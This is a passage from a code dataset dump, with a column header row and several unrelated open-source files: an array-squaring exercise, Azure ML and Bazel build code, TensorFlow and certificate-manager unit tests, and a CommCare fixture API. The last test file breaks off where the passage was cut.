max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
coding patterns/two pointers/sortedarr_square.py | mkoryor/Python | 0 | 4900 | <filename>coding patterns/two pointers/sortedarr_square.py
"""
[E] Given a sorted array, create a new array containing squares of all the
number of the input array in the sorted order.
Input: [-2, -1, 0, 2, 3]
Output: [0, 1, 4, 4, 9]
"""
# Time: O(N) Space: O(n)
def make_squares(arr):
n = len(arr)
squares = [0 for x in range(n)]
highestSquareIdx = n - 1
left, right = 0, n - 1
while left <= right:
leftSquare = arr[left] * arr[left]
rightSquare = arr[right] * arr[right]
if leftSquare > rightSquare:
squares[highestSquareIdx] = leftSquare
left += 1
else:
squares[highestSquareIdx] = rightSquare
right -= 1
highestSquareIdx -= 1
return squares
| 3.890625 | 4 |
modules/evaluate/evaluate_step.py | Azure/aml-object-classification-pipeline | 5 | 4901 | import os
from azureml.pipeline.steps import PythonScriptStep
from azureml.core.runconfig import RunConfiguration
from azureml.core.conda_dependencies import CondaDependencies
from azureml.pipeline.core import PipelineData
from azureml.pipeline.core import PipelineParameter
from azureml.pipeline.steps import EstimatorStep
from azureml.train.dnn import PyTorch
def evaluate_step(model_dir, test_dir, compute_target):
'''
This step evaluates the trained model on the testing data and outputs the accuracy.
:param model_dir: The reference to the directory containing the trained model
:type model_dir: DataReference
:param test_dir: The reference to the directory containing the testing data
:type test_dir: DataReference
:param compute_target: The compute target to run the step on
:type compute_target: ComputeTarget
:return: The preprocess step, step outputs dictionary (keys: accuracy_file)
:rtype: EstimatorStep, dict
'''
accuracy_file = PipelineData(
name='accuracy_file',
pipeline_output_name='accuracy_file',
datastore=test_dir.datastore,
output_mode='mount',
is_directory=False)
outputs = [accuracy_file]
outputs_map = { 'accuracy_file': accuracy_file }
estimator = PyTorch(
source_directory=os.path.dirname(os.path.abspath(__file__)),
entry_script='evaluate.py',
framework_version='1.3',
compute_target=compute_target,
use_gpu=True)
step = EstimatorStep(
name="Evaluate Model",
estimator=estimator,
estimator_entry_script_arguments=[
'--test_dir', test_dir,
'--model_dir', model_dir,
'--accuracy_file', accuracy_file
],
inputs=[model_dir, test_dir],
outputs=outputs,
compute_target=compute_target,
allow_reuse=True)
return step, outputs_map
| 2.359375 | 2 |
configs/mobilenet_cfbi.py | yoxu515/CFBI | 312 | 4902 | import torch
import argparse
import os
import sys
import cv2
import time
class Configuration():
def __init__(self):
self.EXP_NAME = 'mobilenetv2_cfbi'
self.DIR_ROOT = './'
self.DIR_DATA = os.path.join(self.DIR_ROOT, 'datasets')
self.DIR_DAVIS = os.path.join(self.DIR_DATA, 'DAVIS')
self.DIR_YTB = os.path.join(self.DIR_DATA, 'YTB/train')
self.DIR_YTB_EVAL = os.path.join(self.DIR_DATA, 'YTB/valid')
self.DIR_RESULT = os.path.join(self.DIR_ROOT, 'result', self.EXP_NAME)
self.DIR_CKPT = os.path.join(self.DIR_RESULT, 'ckpt')
self.DIR_LOG = os.path.join(self.DIR_RESULT, 'log')
self.DIR_IMG_LOG = os.path.join(self.DIR_RESULT, 'log', 'img')
self.DIR_TB_LOG = os.path.join(self.DIR_RESULT, 'log', 'tensorboard')
self.DIR_EVALUATION = os.path.join(self.DIR_RESULT, 'eval')
self.DATASETS = ['youtubevos']
self.DATA_WORKERS = 4
self.DATA_RANDOMCROP = (465, 465)
self.DATA_RANDOMFLIP = 0.5
self.DATA_MAX_CROP_STEPS = 5
self.DATA_MIN_SCALE_FACTOR = 1.
self.DATA_MAX_SCALE_FACTOR = 1.3
self.DATA_SHORT_EDGE_LEN = 480
self.DATA_RANDOM_REVERSE_SEQ = True
self.DATA_DAVIS_REPEAT = 30
self.DATA_CURR_SEQ_LEN = 3
self.DATA_RANDOM_GAP_DAVIS = 3
self.DATA_RANDOM_GAP_YTB = 3
self.PRETRAIN = True
self.PRETRAIN_FULL = False
self.PRETRAIN_MODEL = './pretrain_models/mobilenetv2-deeplabv3p.pth.tar'
self.MODEL_BACKBONE = 'mobilenet'
self.MODEL_MODULE = 'networks.cfbi.cfbi'
self.MODEL_OUTPUT_STRIDE = 16
self.MODEL_ASPP_OUTDIM = 256
self.MODEL_SHORTCUT_DIM = 48
self.MODEL_SEMANTIC_EMBEDDING_DIM = 100
self.MODEL_HEAD_EMBEDDING_DIM = 256
self.MODEL_PRE_HEAD_EMBEDDING_DIM = 64
self.MODEL_GN_GROUPS = 32
self.MODEL_GN_EMB_GROUPS = 25
self.MODEL_MULTI_LOCAL_DISTANCE = [2, 4, 6, 8, 10, 12]
self.MODEL_LOCAL_DOWNSAMPLE = True
self.MODEL_REFINE_CHANNELS = 64 # n * 32
self.MODEL_LOW_LEVEL_INPLANES = 256 if self.MODEL_BACKBONE == 'resnet' else 24
self.MODEL_RELATED_CHANNELS = 64
self.MODEL_EPSILON = 1e-5
self.MODEL_MATCHING_BACKGROUND = True
self.MODEL_GCT_BETA_WD = True
self.MODEL_FLOAT16_MATCHING = True
self.MODEL_FREEZE_BN = True
self.MODEL_FREEZE_BACKBONE = False
self.TRAIN_TOTAL_STEPS = 100000
self.TRAIN_START_STEP = 0
self.TRAIN_LR = 0.01
self.TRAIN_MOMENTUM = 0.9
self.TRAIN_COSINE_DECAY = False
self.TRAIN_WARM_UP_STEPS = 1000
self.TRAIN_WEIGHT_DECAY = 15e-5
self.TRAIN_POWER = 0.9
self.TRAIN_GPUS = 4
self.TRAIN_BATCH_SIZE = 8
self.TRAIN_START_SEQ_TRAINING_STEPS = self.TRAIN_TOTAL_STEPS / 2
self.TRAIN_TBLOG = False
self.TRAIN_TBLOG_STEP = 60
self.TRAIN_LOG_STEP = 20
self.TRAIN_IMG_LOG = False
self.TRAIN_TOP_K_PERCENT_PIXELS = 0.15
self.TRAIN_HARD_MINING_STEP = self.TRAIN_TOTAL_STEPS / 2
self.TRAIN_CLIP_GRAD_NORM = 5.
self.TRAIN_SAVE_STEP = 1000
self.TRAIN_MAX_KEEP_CKPT = 8
self.TRAIN_RESUME = False
self.TRAIN_RESUME_CKPT = None
self.TRAIN_RESUME_STEP = 0
self.TRAIN_AUTO_RESUME = True
self.TRAIN_GLOBAL_ATROUS_RATE = 1
self.TRAIN_LOCAL_ATROUS_RATE = 1
self.TRAIN_GLOBAL_CHUNKS = 20
self.TRAIN_DATASET_FULL_RESOLUTION = True
self.TEST_GPU_ID = 0
self.TEST_DATASET = 'youtubevos'
self.TEST_DATASET_FULL_RESOLUTION = False
self.TEST_DATASET_SPLIT = ['val']
self.TEST_CKPT_PATH = None
self.TEST_CKPT_STEP = None # if "None", evaluate the latest checkpoint.
self.TEST_FLIP = False
self.TEST_MULTISCALE = [1]
self.TEST_MIN_SIZE = None
self.TEST_MAX_SIZE = 800 * 1.3 if self.TEST_MULTISCALE == [1] else 800
self.TEST_WORKERS = 4
self.TEST_GLOBAL_CHUNKS = 4
self.TEST_GLOBAL_ATROUS_RATE = 2
self.TEST_LOCAL_ATROUS_RATE = 1
# dist
self.DIST_ENABLE = True
self.DIST_BACKEND = "gloo"
self.DIST_URL = "file://./sharefile"
self.DIST_START_GPU = 0
self.__check()
def __check(self):
if not torch.cuda.is_available():
raise ValueError('config.py: cuda is not avalable')
if self.TRAIN_GPUS == 0:
raise ValueError('config.py: the number of GPU is 0')
for path in [self.DIR_RESULT, self.DIR_CKPT, self.DIR_LOG, self.DIR_EVALUATION, self.DIR_IMG_LOG, self.DIR_TB_LOG]:
if not os.path.isdir(path):
os.makedirs(path)
cfg = Configuration()
| 2.0625 | 2 |
js/matrixjs/matrix_compile.py | kennytilton/ConnectJS | 7 | 4903 | <gh_stars>1-10
#!/usr/bin/python2.4
import httplib, urllib, sys
# Define the parameters for the POST request and encode them in
# a URL-safe format.
params = urllib.urlencode([
#('js_code', sys.argv[1]),
('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Cells.js'),
('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Model.js'),
('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Tag.js'),
('compilation_level', 'ADVANCED_OPTIMIZATIONS'),
('output_format', 'text'),
('output_info', 'warnings'),
])
# Always use the following value for the Content-type header.
headers = { "Content-type": "application/x-www-form-urlencoded" }
conn = httplib.HTTPConnection('closure-compiler.appspot.com')
conn.request('POST', '/compile', params, headers)
response = conn.getresponse()
data = response.read()
print data
conn.close() | 2.546875 | 3 |
tensorflow/python/util/tf_should_use_test.py | npow/tensorflow | 0 | 4904 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tf_should_use."""
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import sys
from tensorflow.python.framework import constant_op
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.util import tf_should_use
@contextlib.contextmanager
def reroute_error():
"""Temporarily reroute errors written to tf_logging.error into `captured`."""
with test.mock.patch.object(tf_should_use.tf_logging, 'error') as error:
with test.mock.patch.object(tf_should_use.tf_logging, 'fatal') as fatal:
yield error, fatal
class TfShouldUseTest(test.TestCase):
def testAddShouldUseWarningWhenNotUsed(self):
c = constant_op.constant(0, name='blah0')
def in_this_function():
h = tf_should_use._add_should_use_warning(c)
del h
with reroute_error() as (error, _):
in_this_function()
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah0:0', msg)
self.assertIn('in_this_function', msg)
self.assertFalse(gc.garbage)
def testAddShouldUseFatalWhenNotUsed(self):
c = constant_op.constant(0, name='blah0')
def in_this_function():
h = tf_should_use._add_should_use_warning(c, fatal_error=True)
del h
with reroute_error() as (_, fatal):
in_this_function()
fatal.assert_called()
msg = '\n'.join(fatal.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah0:0', msg)
self.assertIn('in_this_function', msg)
self.assertFalse(gc.garbage)
def _testAddShouldUseWarningWhenUsed(self, fn, name):
c = constant_op.constant(0, name=name)
with reroute_error() as (error, fatal):
h = tf_should_use._add_should_use_warning(c)
fn(h)
del h
error.assert_not_called()
fatal.assert_not_called()
def testAddShouldUseWarningWhenUsedWithAdd(self):
def add(h):
_ = h + 1
self._testAddShouldUseWarningWhenUsed(add, name='blah_add')
gc.collect()
self.assertFalse(gc.garbage)
def testAddShouldUseWarningWhenUsedWithGetName(self):
def get_name(h):
_ = h.name
self._testAddShouldUseWarningWhenUsed(get_name, name='blah_get_name')
gc.collect()
self.assertFalse(gc.garbage)
def testShouldUseResult(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah2')
with reroute_error() as (error, _):
return_const(0.0)
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah2:0', msg)
self.assertIn('return_const', msg)
gc.collect()
self.assertFalse(gc.garbage)
def testShouldUseResultWhenNotReallyUsed(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah3')
with reroute_error() as (error, _):
with self.test_session():
return_const(0.0)
# Creating another op and executing it does not mark the
# unused op as being "used".
v = constant_op.constant(1.0, name='meh')
v.eval()
error.assert_called()
msg = '\n'.join(error.call_args[0])
self.assertIn('Object was never used', msg)
self.assertIn('blah3:0', msg)
self.assertIn('return_const', msg)
gc.collect()
self.assertFalse(gc.garbage)
# Tests that mark_used is available in the API.
def testMarkUsed(self):
@tf_should_use.should_use_result
def return_const(value):
return constant_op.constant(value, name='blah3')
with self.test_session():
return_const(0.0).mark_used()
if __name__ == '__main__':
test.main()
| 1.734375 | 2 |
tools/jdk/local_java_repository.bzl | loongarch64/bazel | 16,989 | 4905 | <reponame>loongarch64/bazel
# Copyright 2020 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rules for importing and registering a local JDK."""
load(":default_java_toolchain.bzl", "JVM8_TOOLCHAIN_CONFIGURATION", "default_java_toolchain")
def _detect_java_version(repository_ctx, java_bin):
properties_out = repository_ctx.execute([java_bin, "-XshowSettings:properties"]).stderr
# This returns an indented list of properties separated with newlines:
# " java.vendor.url.bug = ... \n"
# " java.version = 11.0.8\n"
# " java.version.date = 2020-11-05\"
strip_properties = [property.strip() for property in properties_out.splitlines()]
version_property = [property for property in strip_properties if property.startswith("java.version = ")]
if len(version_property) != 1:
return None
version_value = version_property[0][len("java.version = "):]
parts = version_value.split(".")
major = parts[0]
if len(parts) == 1:
return major
elif major == "1": # handles versions below 1.8
minor = parts[1]
return minor
return major
def local_java_runtime(name, java_home, version, runtime_name = None, visibility = ["//visibility:public"]):
"""Defines a java_runtime target together with Java runtime and compile toolchain definitions.
Java runtime toolchain is constrained by flag --java_runtime_version having
value set to either name or version argument.
Java compile toolchains are created for --java_language_version flags values
between 8 and version (inclusive). Java compile toolchains use the same
(local) JDK for compilation. This requires a different configuration for JDK8
than the newer versions.
Args:
name: name of the target.
java_home: Path to the JDK.
version: Version of the JDK.
runtime_name: name of java_runtime target if it already exists.
visibility: Visibility that will be applied to the java runtime target
"""
if runtime_name == None:
runtime_name = name
native.java_runtime(
name = runtime_name,
java_home = java_home,
visibility = visibility,
)
native.config_setting(
name = name + "_name_setting",
values = {"java_runtime_version": name},
visibility = ["//visibility:private"],
)
native.config_setting(
name = name + "_version_setting",
values = {"java_runtime_version": version},
visibility = ["//visibility:private"],
)
native.config_setting(
name = name + "_name_version_setting",
values = {"java_runtime_version": name + "_" + version},
visibility = ["//visibility:private"],
)
native.alias(
name = name + "_settings_alias",
actual = select({
name + "_name_setting": name + "_name_setting",
name + "_version_setting": name + "_version_setting",
"//conditions:default": name + "_name_version_setting",
}),
visibility = ["//visibility:private"],
)
native.toolchain(
name = "runtime_toolchain_definition",
target_settings = [":%s_settings_alias" % name],
toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type",
toolchain = runtime_name,
)
if version == "8":
default_java_toolchain(
name = name + "_toolchain_java8",
configuration = JVM8_TOOLCHAIN_CONFIGURATION,
source_version = version,
target_version = version,
java_runtime = runtime_name,
)
elif type(version) == type("") and version.isdigit() and int(version) > 8:
for version in range(8, int(version) + 1):
default_java_toolchain(
name = name + "_toolchain_java" + str(version),
source_version = str(version),
target_version = str(version),
java_runtime = runtime_name,
)
# else version is not recognized and no compilation toolchains are predefined
def _local_java_repository_impl(repository_ctx):
"""Repository rule local_java_repository implementation.
Args:
repository_ctx: repository context
"""
java_home = repository_ctx.attr.java_home
java_home_path = repository_ctx.path(java_home)
if not java_home_path.exists:
fail('The path indicated by the "java_home" attribute "%s" (absolute: "%s") ' +
"does not exist." % (java_home, str(java_home_path)))
repository_ctx.file(
"WORKSPACE",
"# DO NOT EDIT: automatically generated WORKSPACE file for local_java_repository\n" +
"workspace(name = \"{name}\")\n".format(name = repository_ctx.name),
)
extension = ".exe" if repository_ctx.os.name.lower().find("windows") != -1 else ""
java_bin = java_home_path.get_child("bin").get_child("java" + extension)
if not java_bin.exists:
# Java binary does not exist
repository_ctx.file(
"BUILD.bazel",
_NOJDK_BUILD_TPL.format(
local_jdk = repository_ctx.name,
java_binary = "bin/java" + extension,
java_home = java_home,
),
False,
)
return
# Detect version
version = repository_ctx.attr.version if repository_ctx.attr.version != "" else _detect_java_version(repository_ctx, java_bin)
# Prepare BUILD file using "local_java_runtime" macro
build_file = ""
if repository_ctx.attr.build_file != None:
build_file = repository_ctx.read(repository_ctx.path(repository_ctx.attr.build_file))
runtime_name = '"jdk"' if repository_ctx.attr.build_file else None
local_java_runtime_macro = """
local_java_runtime(
name = "%s",
runtime_name = %s,
java_home = "%s",
version = "%s",
)
""" % (repository_ctx.name, runtime_name, java_home, version)
repository_ctx.file(
"BUILD.bazel",
'load("@bazel_tools//tools/jdk:local_java_repository.bzl", "local_java_runtime")\n' +
build_file +
local_java_runtime_macro,
)
# Symlink all files
for file in repository_ctx.path(java_home).readdir():
repository_ctx.symlink(file, file.basename)
# Build file template, when JDK does not exist
_NOJDK_BUILD_TPL = '''load("@bazel_tools//tools/jdk:fail_rule.bzl", "fail_rule")
fail_rule(
name = "jdk",
header = "Auto-Configuration Error:",
message = ("Cannot find Java binary {java_binary} in {java_home}; either correct your JAVA_HOME, " +
"PATH or specify Java from remote repository (e.g. " +
"--java_runtime_version=remotejdk_11")
)
config_setting(
name = "localjdk_setting",
values = {{"java_runtime_version": "{local_jdk}"}},
visibility = ["//visibility:private"],
)
toolchain(
name = "runtime_toolchain_definition",
target_settings = [":localjdk_setting"],
toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type",
toolchain = ":jdk",
)
'''
_local_java_repository_rule = repository_rule(
implementation = _local_java_repository_impl,
local = True,
configure = True,
attrs = {
"java_home": attr.string(),
"version": attr.string(),
"build_file": attr.label(),
},
)
def local_java_repository(name, java_home, version = "", build_file = None):
"""Registers a runtime toolchain for local JDK and creates an unregistered compile toolchain.
Toolchain resolution is constrained with --java_runtime_version flag
having value of the "name" or "version" parameter.
Java compile toolchains are created for --java_language_version flags values
between 8 and version (inclusive). Java compile toolchains use the same
(local) JDK for compilation.
If there is no JDK "virtual" targets are created, which fail only when actually needed.
Args:
name: A unique name for this rule.
java_home: Location of the JDK imported.
build_file: optionally BUILD file template
version: optionally java version
"""
_local_java_repository_rule(name = name, java_home = java_home, version = version, build_file = build_file)
native.register_toolchains("@" + name + "//:runtime_toolchain_definition")
| 1.960938 | 2 |
corehq/apps/fixtures/resources/v0_1.py | SEL-Columbia/commcare-hq | 1 | 4906 | from couchdbkit import ResourceNotFound
from tastypie import fields as tp_f
from corehq.apps.api.resources import JsonResource
from corehq.apps.api.resources.v0_1 import (
CustomResourceMeta,
RequirePermissionAuthentication,
)
from corehq.apps.api.util import get_object_or_not_exist
from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType
from corehq.apps.users.models import Permissions
def convert_fdt(fdi):
try:
fdt = FixtureDataType.get(fdi.data_type_id)
fdi.fixture_type = fdt.tag
return fdi
except ResourceNotFound:
return fdi
class FixtureResource(JsonResource):
type = "fixture"
fields = tp_f.DictField(attribute='try_fields_without_attributes',
readonly=True, unique=True)
# when null, that means the ref'd fixture type was not found
fixture_type = tp_f.CharField(attribute='fixture_type', readonly=True,
null=True)
id = tp_f.CharField(attribute='_id', readonly=True, unique=True)
def obj_get(self, bundle, **kwargs):
return convert_fdt(get_object_or_not_exist(
FixtureDataItem, kwargs['pk'], kwargs['domain']))
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
parent_id = bundle.request.GET.get("parent_id", None)
parent_ref_name = bundle.request.GET.get("parent_ref_name", None)
references = bundle.request.GET.get("references", None)
child_type = bundle.request.GET.get("child_type", None)
type_id = bundle.request.GET.get("fixture_type_id", None)
type_tag = bundle.request.GET.get("fixture_type", None)
if parent_id and parent_ref_name and child_type and references:
parent_fdi = FixtureDataItem.get(parent_id)
fdis = list(
FixtureDataItem.by_field_value(
domain, child_type, parent_ref_name,
parent_fdi.fields_without_attributes[references])
)
elif type_id or type_tag:
type_id = type_id or FixtureDataType.by_domain_tag(
domain, type_tag).one()
fdis = list(FixtureDataItem.by_data_type(domain, type_id))
else:
fdis = list(FixtureDataItem.by_domain(domain))
return [convert_fdt(fdi) for fdi in fdis] or []
class Meta(CustomResourceMeta):
authentication = RequirePermissionAuthentication(Permissions.edit_apps)
object_class = FixtureDataItem
resource_name = 'fixture'
limit = 0
| 1.945313 | 2 |
tests/test_domain.py | broadinstitute/cert_manager_api | 0 | 4907 | # -*- coding: utf-8 -*-
"""Define the cert_manager.domain.Domain unit tests."""
# Don't warn about things that happen as that is part of unit testing
# pylint: disable=protected-access
# pylint: disable=no-member
import json
from requests.exceptions import HTTPError
from testtools import TestCase
import responses
from cert_manager.domain import Domain, DomainCreationResponseError
from .lib.testbase import ClientFixture
class TestDomain(TestCase): # pylint: disable=too-few-public-methods
"""Serve as a Base class for all tests of the Domain class."""
def setUp(self): # pylint: disable=invalid-name
"""Initialize the class."""
# Call the inherited setUp method
super().setUp()
# Make sure the Client fixture is created and setup
self.cfixt = self.useFixture(ClientFixture())
self.client = self.cfixt.client
self.api_url = f"{self.cfixt.base_url}/domain/v1"
# Setup a test response one would expect normally
self.valid_response = [
{"id": 1234, "name": "example.com"},
{"id": 4321, "name": "*.example.com"},
{"id": 4322, "name": "subdomain.example.com"},
]
# Setup a test response for getting a specific Domain
self.valid_individual_response = self.valid_response[0]
self.valid_individual_response["status"] = "Active"
# Setup JSON to return in an error
self.error_response = {"description": "domain error"}
class TestInit(TestDomain):
"""Test the class initializer."""
@responses.activate
def test_param(self):
"""The URL should change if api_version is passed as a parameter."""
# Set a new version
version = "v3"
api_url = f"{self.cfixt.base_url}/domain/{version}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client, api_version=version)
data = domain.all()
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response)
def test_need_client(self):
"""The class should raise an exception without a client parameter."""
self.assertRaises(TypeError, Domain)
class TestAll(TestDomain):
"""Test the .all method."""
@responses.activate
def test_cached(self):
"""The function should return all the data, but should not query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all()
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_forced(self):
"""The function should return all the data, but should query the API twice."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.all()
data = domain.all(force=True)
# Verify all the query information
# There should only be one call the first time "all" is called.
# Due to pagination, this is only guaranteed as long as the number of
# entries returned is less than the page size
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[0].request.url, self.api_url)
self.assertEqual(responses.calls[1].request.url, self.api_url)
self.assertEqual(data, self.valid_response)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.all)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestFind(TestDomain):
"""Test the .find method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will return all domains"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response, status=200)
domain = Domain(client=self.client)
data = domain.find()
self.assertEqual(data, self.valid_response)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.valid_response[0], status=200)
api_url = f"{self.api_url}?name=example.com"
domain = Domain(client=self.client)
data = domain.find(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_response[0])
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if domains cannot be retrieved from the API."""
# Setup the mocked response
responses.add(responses.GET, self.api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.find)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, self.api_url)
class TestCount(TestDomain):
"""Test the .count method."""
@responses.activate
def test_no_params(self):
"""Without parameters, the method will count all domains"""
# Setup the mocked response
count = {"count": len(self.valid_response)}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count()
self.assertEqual(data, count)
self.assertEqual(responses.calls[0].request.url, api_url)
@responses.activate
def test_params(self):
"""Parameters will be passed to API"""
# Setup the mocked response
count = {"count": len(self.valid_response[0])}
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=count, status=200)
domain = Domain(client=self.client)
data = domain.count(name="example.com")
# Verify all the query information
self.assertEqual(responses.calls[0].request.url, f"{api_url}?name=example.com")
self.assertEqual(data, count)
@responses.activate
def test_bad_http(self):
"""The function should raise an HTTPError exception if counts cannot be retrieved from the API."""
# Setup the mocked response
api_url = f"{self.api_url}/count"
responses.add(responses.GET, api_url, json=self.error_response, status=400)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.count)
# Verify all the query information
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
class TestGet(TestDomain):
"""Test the .get method."""
@responses.activate
def test_need_domain_id(self):
"""The function should raise an exception without an domain_id parameter."""
domain = Domain(client=self.client)
self.assertRaises(TypeError, domain.get)
@responses.activate
def test_domain_id(self):
"""The function should return data about the specified Domain ID."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, json=self.valid_individual_response, status=200)
domain = Domain(client=self.client)
data = domain.get(domain_id)
self.assertEqual(len(responses.calls), 1)
self.assertEqual(responses.calls[0].request.url, api_url)
self.assertEqual(data, self.valid_individual_response)
@responses.activate
def test_ne_domain_id(self):
"""The function should raise an HTTPError exception if the specified Domain ID does not exist."""
domain_id = 2345
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.GET, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.get, domain_id)
class TestCreate(TestDomain):
"""Test the .create method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# Not going to check every permutation of missing parameters,
# but verify that something is required
self.assertRaises(TypeError, domain.create)
@responses.activate
def test_create_success(self):
"""
The function should return the created domain ID,
as well as add all parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
org_id = 4321
types = ["SSL"]
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": org_id, "certTypes": types}]
}
response = domain.create("sub2.example.com", org_id, types)
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_success_optional_params(self):
"""
The function should return the created domain ID when additional params are specified,
as well add the non-required parameters to the request body
"""
# Setup the mocked response
domain_id = 1234
location = f"{self.api_url}/{str(domain_id)}"
responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201)
domain = Domain(client=self.client)
post_data = {
"name": "sub2.example.com",
"delegations": [{"orgId": 4321, "certTypes": ["SSL"]}],
"description": "Example sub domain"
}
response = domain.create("sub2.example.com", 4321, ["SSL"], description="Example sub domain")
self.assertEqual(response, {"id": domain_id})
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_create_failure_http_error(self):
"""
The function should return an error code and description if the Domain
creation failed.
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=400)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["other"]
}
self.assertRaises(ValueError, domain.create, **create_args)
@responses.activate
def test_create_failure_http_status_unexpected(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(unexpected HTTP status code).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=200)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_missing_location_header(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(no Location header in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_domain_id_not_found(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(Domain ID not found in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, headers={"Location": "not a url"}, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
class TestDelete(TestDomain):
"""Test the .delete method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delete)
@responses.activate
def test_delete_success(self):
"""The function should return True if the deletion succeeded."""
domain_id = 1234
